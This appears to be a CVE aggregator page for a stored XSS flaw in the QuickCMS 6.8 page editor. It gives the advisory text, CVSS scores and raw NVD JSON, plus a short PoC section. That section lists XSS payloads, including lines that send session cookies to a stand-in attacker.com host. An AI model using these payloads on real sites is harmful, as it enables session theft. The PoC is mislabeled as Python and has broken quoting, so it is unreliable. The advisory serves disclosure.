CVE-2025-9980

Description

QuickCMS is vulnerable to multiple Stored XSS in page editor functionality (pages-form). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when visiting edited page. By default admin user is not able to add JavaScript into the website. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:* - VULNERABLE

QuickCMS 6.8 (确认受影响)

QuickCMS 其他版本 (可能受影响，未测试)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-9980 QuickCMS Stored XSS PoC
// Target: QuickCMS pages-form functionality

// Step 1: Login as admin user
const loginPayload = {
    username: 'admin',
    password: 'admin_password'
};

// Step 2: Navigate to page editor (pages-form)
// POST /admin/pages-form?action=edit&id=1 HTTP/1.1

// Step 3: Inject XSS payload in page content fields
// Example payloads for different fields:

// Payload 1: Basic script injection
const xssPayload1 = '<script>alert(document.cookie)</script>';

// Payload 2: Event handler injection
const xssPayload2 = '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\">';

// Payload 3: SVG injection
const xssPayload3 = '<svg onload="eval(atob(\"YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\"))">';

// Step 4: Send malicious page edit request
const exploitRequest = {
    method: 'POST',
    path: '/admin/pages-form',
    body: {
        page_title: 'Normal Page Title <script>alert(1)</script>',
        page_content: '<p>Content with <img src=x onerror=alert(document.domain)> injection</p>',
        page_template: 'default'
    }
};

// Step 5: When victim visits the edited page, XSS will execute
// <script>window.location='https://attacker.com/phishing?c='+document.cookie</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9980
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9980
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9980/
[4] VulDB https://vuldb.com/cve/CVE-2025-9980
[5] https://cert.pl/posts/2025/10/CVE-2025-9980
[6] https://opensolution.org/cms-system-quick-cms.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9980", "sourceIdentifier": "[email protected]", "published": "2025-10-23T10:15:32.393", "lastModified": "2025-11-17T16:01:39.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QuickCMS is vulnerable to multiple Stored XSS in page editor functionality (pages-form). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when visiting edited page. By default admin user is not able to add JavaScript into the website.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:*", "matchCriteriaId": "D38DD588-2254-48CA-922B-A803E730F60E"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/10/CVE-2025-9980", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/cms-system-quick-cms.html", "source": "[email protected]", "tags": ["Product"]}]}}